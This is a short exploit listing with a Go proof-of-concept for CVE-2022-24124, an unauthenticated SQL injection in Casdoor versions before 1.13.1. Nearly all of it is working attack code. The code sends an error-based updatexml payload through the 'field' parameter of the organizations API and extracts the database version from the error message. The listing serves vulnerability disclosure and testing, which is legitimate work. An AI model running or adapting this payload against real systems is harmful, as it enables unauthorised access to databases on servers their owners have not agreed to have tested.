Casdoor 1.13.0 - SQL Injection (Unauthenticated)

// Exploit Title: Casdoor 1.13.0 - SQL Injection (Unauthenticated) 
// Date: 2022-02-25
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://casdoor.org/
// Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0
// Version: version < 1.13.1
// Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r
// Tested on: Kali Linux
// CVE : CVE-2022-24124
// Github POC: https://github.com/ColdFusionX/CVE-2022-24124

// Exploit Usage : go run exploit.go -u http://127.0.0.1:8080

package main

import (
	"flag"
	"fmt"
	"html"
	"io/ioutil"
	"net/http"
	"os"
	"regexp"
	"strings"
)

func main() {
	var url string
	flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)")
	flag.Parse()

	banner := `
-=Casdoor SQL Injection (CVE-2022-24124)=- 
- by Mayank Deshmukh (ColdFusionX)

`
	fmt.Printf(banner)
	fmt.Println("[*] Dumping Database Version")
	response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)")

	if err != nil {
		panic(err)
	}

	defer response.Body.Close()

	databytes, err := ioutil.ReadAll(response.Body)

	if err != nil {
		panic(err)
	}

	content := string(databytes)

	re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)")

	result := re.FindAllString(content, -1)
	
	sqliop := fmt.Sprint(result)
	replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "")
	
	finalop := replacer.Replace(sqliop)
	fmt.Println(html.UnescapeString(finalop))


	if result == nil {
		fmt.Printf("Application not vulnerable\n")
		os.Exit(1)
	}

}